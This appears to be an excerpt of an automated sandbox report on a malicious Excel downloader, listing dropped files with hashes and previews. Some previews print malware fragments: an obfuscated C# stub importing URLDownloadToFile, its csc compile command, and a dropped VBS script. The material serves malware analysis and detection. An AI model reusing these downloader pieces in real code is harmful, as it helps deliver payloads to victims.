Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.m.o.r.f.a.n.h.a.r.)..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1AD36F6.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	172076
Entropy (8bit):	3.1342558498505824
Encrypted:	false
SSDEEP:	1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
MD5:	D85DAC1376E45C58F790BD50C2729F6C
SHA1:	5BD339C54A944689935652E4A1CC78961EB19589
SHA-256:	CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
SHA-512:	6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
Malicious:	false
Preview:	....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......

C:\Users\user\AppData\Local\Temp\2whqha0s.5gp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\RESB606.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 19:22:51 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.979698879857167
Encrypted:	false
SSDEEP:	24:H2e9Eur8KYcdH3wKdNWI+ycuZhNEakSAPNnqSqd:zrgcgKd41ulEa3YqSK
MD5:	C0E428AB37AFFEF4DCFAC97392E8603F
SHA1:	425C1AA971425A36F72D373C5A3E0306E1A92841
SHA-256:	18886A15D19AE5C39A2DD54C2C6066F937E3336442A7D2958C8638A1FF71B7BF
SHA-512:	DF64EECDD06A3ED00C316170EDFB82A03768B1A94BA6636A950523A55D136CFFF51BB5C3247010D95C5ADB028D09C034A51291840878E06172F19BE64512B394
Malicious:	false
Preview:	L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP.................%..L.p.U4..y.Q8..........4.......C:\Users\user\AppData\Local\Temp\RESB606.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.g.c.x.3.o.u.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\cxpovzpe.jz0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\hrd142a2.xme.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1060952065385106
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCak7YnqqAPN5Dlq5J:+RI+ycuZhNEakSAPNnqX
MD5:	C42580A24CDC70855534A9E079C35138
SHA1:	46E338443B93E479394E861B04D69616D3AF3469
SHA-256:	2853512183B58085E792E952C357914E204C2C9B8A3C162B5C1235EDDE412CA2
SHA-512:	F31C2E9F314F13F8EA005932574D6BB9CE18756D62ED82086FD40B4709BAF689648ACB2E1240B45341FBC4A57CF963FC21EA0307D8EE1A21DDAAFF9B71C8DEDB
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.g.c.x.3.o.u.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.g.c.x.3.o.u.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (356)
Category:	dropped
Size (bytes):	471
Entropy (8bit):	3.812832561152431
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zugnYvtIXemMGtJQXReKJ8SRHy4HEmIZ1bp7Rty:V/DTLDfuiCRbXfHoh1Xy
MD5:	465B774D7A1A641088FF65CB56D1755B
SHA1:	D65FF3C3ECD67B7DA02D199D649ABB75A8C64879
SHA-256:	737CEB1CFF20744C7D2EB5139717221CF2C96F10D05D5FFFD3D916FD69A6D025
SHA-512:	665F11DFA5A6A79B89C49724AD1943BAEA2EA54CB204EF3712ABB948218064410B42EE96B29F067FC635BC71EC85295603567BF2E9121D381FA2DFBC6C07EA68
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace YwoBcGOgni.{. public class S. {. [DllImport("urLmOn.DlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr zlGgjppE,string DYBlW,string pIyGVu,uint k,IntPtr OITihJRyY);.. }..}.

C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.243233466077736
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23frQG+zxs7+AEszIP23frQcn:p37Lvkmb6KzcG+WZEocc
MD5:	E548347EE8EFCA63174A54CC444905DB
SHA1:	B38DDE389162258EDDEEE33BDDE132AA23BB6411
SHA-256:	57B8E2CB1A584FF3136B5BFFD970C9A3DEF41A14D119039686B985E4E556016E
SHA-512:	D2FFF3C8918437B191BE62CDA089A77DEE67F6C8DF05721A26FDC3242B0B1269A6A1D0A8B76D05C6555C7B3A35F9AEDF5482494894307D3BD838916630753E1F
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs"

C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.827026584265545
Encrypted:	false
SSDEEP:	24:etGSQPBe5ekrl8c2lOkfdkOtkZf+RbCZ0WI+ycuZhNEakSAPNnq:6fskr+/lSBJ+RbCZX1ulEa3Yq
MD5:	0ED4EDE2F77BAF8C50E9CDD8507CCDD2
SHA1:	EBAF3364F4BA8F8B84D94C2E6D98F72F829BF44A
SHA-256:	00F8F94D686B0F8933D86F24F72DC046EF694D840ACD4BBC77EB887D76035F00
SHA-512:	8CDAF4C29BA5A21ED68BAF84D0307535BF79DFCAC7BE48B065CB36B401E62B91F457134ACB58BB371AD44746AE58602773809478C1D4D001A38777D8F52E673F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....u.....u.......................................... ;.....P ......M.........S.....\.....b.....i.....k...M.....M...!.M.....M.......!............;.......................................$..........<Module>.mg

C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.33524063267165
Encrypted:	false
SSDEEP:	24:AId3ka6KzZ/EoEKaMD5DqBVKVrdFAMBJTH:Akka60FEoEKdDcVKdBJj
MD5:	4EEAA3D3640F6514D87261BF2AFE0722
SHA1:	3EF512CB8CC35E6BA90DAF53006C594083382F0B
SHA-256:	ED0A4A6473AFF838C986790F84443D08443DE92A29C30D38A5934858F5AD9766
SHA-512:	D3A56B7154DDECF35663F3A828D21BFFA9EFEC7261C731C9FA1D97B80D75B0FC591E9D9E6F692019B1073E11488532714E5DD331450A0B457B3590B5259011BD
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\onmobile.052.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\oy5ige3r.s3s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\rkssuzly.mkd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\rsexq0o0.otx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\ty0431oy.k2y.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF22AE04FAAD033A29.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF449E3A8D3C8ED422.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	data
Category:	modified
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	141118
Entropy (8bit):	3.6910993454239835
Encrypted:	false
SSDEEP:	3072:airLgt5pUGwjz5D7euCuqhYJ5PcJXqlgLR+eAMiKGG2:yYJBc5qlgLAY2
MD5:	FE9E18E3366CA7AC8C21EB1CE0631D9C
SHA1:	51BC2BC37E87E2D64129CAD63DF697A68EE3B9D6
SHA-256:	01C6399FC31B4CBFCF8E851FF3FF433D36B46DA2577F9230B9C78B2CBF790912
SHA-512:	7DCA4FB22F5F1A6E08F6C993A7B159863B8B1A8898429AED78582641BC2340CE2FBE3E92F6EC5F9D6EC5C74A14009F77CE87602BEA7BA59C4EA1E092D5A9F8F7
Malicious:	true
Preview:	..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.m.o.r.f.a.n.h.a.r.)..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .d.e.s.a.m.o.r.t.i.z.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .d.e.s.a.m.o.r.t.i.z.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.

C:\Users\user\Desktop\09230000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	7.808933670572312
Encrypted:	false
SSDEEP:	1536:FiqHy1S6F8b2SQrEkawpoXIo8GP+YQoiFOWnfjuwLvLz8F5jKH:feFHrE2sIoj+fjuwLvXd
MD5:	E5251EA26FDFD63A7FE679E4FA68B708
SHA1:	50C2B85B1E6A21F80CD1639740405565CAB5B487
SHA-256:	08BA40FED3059D148C06A140047C40946FD866947C20A2F4AB8774371BBAD70E
SHA-512:	41791F74D261C793E395FB173B8E722D035328CEDD24B75710973549F68CAE3E2F3C71440C0D076F9DCE7B37CC30620EACD1998DFFA7C82CBB2E6792ED377BD6
Malicious:	false
Preview:	......................>...................................N...................P........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...................R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\09230000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 20:22:56 2024, Security: 1
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	7.808933670572312
Encrypted:	false
SSDEEP:	1536:FiqHy1S6F8b2SQrEkawpoXIo8GP+YQoiFOWnfjuwLvLz8F5jKH:feFHrE2sIoj+fjuwLvXd
MD5:	E5251EA26FDFD63A7FE679E4FA68B708
SHA1:	50C2B85B1E6A21F80CD1639740405565CAB5B487
SHA-256:	08BA40FED3059D148C06A140047C40946FD866947C20A2F4AB8774371BBAD70E
SHA-512:	41791F74D261C793E395FB173B8E722D035328CEDD24B75710973549F68CAE3E2F3C71440C0D076F9DCE7B37CC30620EACD1998DFFA7C82CBB2E6792ED377BD6
Malicious:	false
Preview:	......................>...................................N...................P........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...................R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\~$SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	modified
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 01:49:36 2024, Security: 1
Entropy (8bit):	7.5933247132448125
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
File size:	100'352 bytes
MD5:	ad791e87a785989bf5dc066db100e652
SHA1:	dabe7215a329944fd262906aae16b9c9ec689c0e
SHA256:	26daad7f2b88dfa67240b07b416d9261909f0398e17e8a62e29a8e324d49d94d
